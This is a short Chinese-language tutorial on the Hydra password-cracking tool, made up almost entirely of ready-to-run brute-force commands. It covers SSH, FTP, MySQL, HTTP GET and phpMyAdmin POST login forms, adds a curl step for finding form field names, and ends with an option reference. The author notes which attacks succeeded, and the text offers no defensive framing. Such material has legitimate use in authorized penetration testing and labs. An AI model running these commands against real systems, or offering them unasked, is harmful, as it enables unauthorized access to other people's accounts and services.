hydra九头蛇是常用的密码破解工具
1、破解centos ssh密码
hydra -l root -P password.txt ssh://192.168.1.107:2222
hydra -l root -P password.txt -s 2222 192.168.1.107 ssh
2、破解ftp
hydra -l allen -P e:\aa.txt ftp://127.0.0.1
hydra -l allen -P e:\aa.txt ftp://127.0.0.1:21
hydra -l allen -P e:\aa.txt -s 21 127.0.0.1 ftp
3、破解mysql(我没有破解成功,但是我用metasploit破解成功了)
hydra -l root -P password.txt -s 3306 192.168.1.107 mysql
hydra -l root -P password.txt mysql://192.168.1.107:3306
4、http-get破解
hydra -l admin -P passwords.txt http-get://example.com
5、http-post破解
# 先找到post提交用的登录用户名和密码表单一般是name="xxx"
curl -s http://192.168.1.105/phpMyAdmin/index.php|grep --color "name"
--------------------------------
<input type="text" name="pma_username" id="input_username" value="" size="24" class="textfield"/>
<input type="password" name="pma_password" id="input_password" value="" size="24" class="textfield" />
# 再执行命令(该网站burpsuite没有破解成功,但是hydra破解成功了)
hydra -l root -P password.txt 192.168.1.105 http-post-form "/phpMyAdmin/index.php:pma_username=^USER^&pma_password=^PASS^:error"
hydra -L username.txt -P password.txt 192.168.1.105 http-post-form "/phpMyAdmin/index.php:pma_username=^USER^&pma_password=^PASS^:error"
----------------
-L 指定用户,它会一个用户和一堆密码进行比对,然后再用第2个用户和一堆密码进行比对,一直比对到最后一个用户
http-post-from表示post请求方式
/phpMyAdmin/index.php是请求的url页面
pma_username=^USER^ 前面是查到表单登录用户的值 ^USER^是固定写法
error: 是固定写法一定要这样写否则会出问题(已验证)
帮助
hydra [options] target [protocol]
-l login:小写,指定用户名进行破解。
-L file:大写,指定用户的用户名字典。
-p pass:小写,用于指定密码破解,很少使用,一般采用密码字典。
-P file:大写,用于指定密码字典。
-C:使用冒号分割格式,例如"登录名:密码"来代替-L/-P参数。
-e ns:额外的选项,n:空密码试探;s:使用指定账户和密码试探。
-o file:指定结果输出到文件。
-s port:小写,可通过此参数指定非默认端口。
-t tasks:指定并发任务数,默认为16。
-vV:显示详细过程。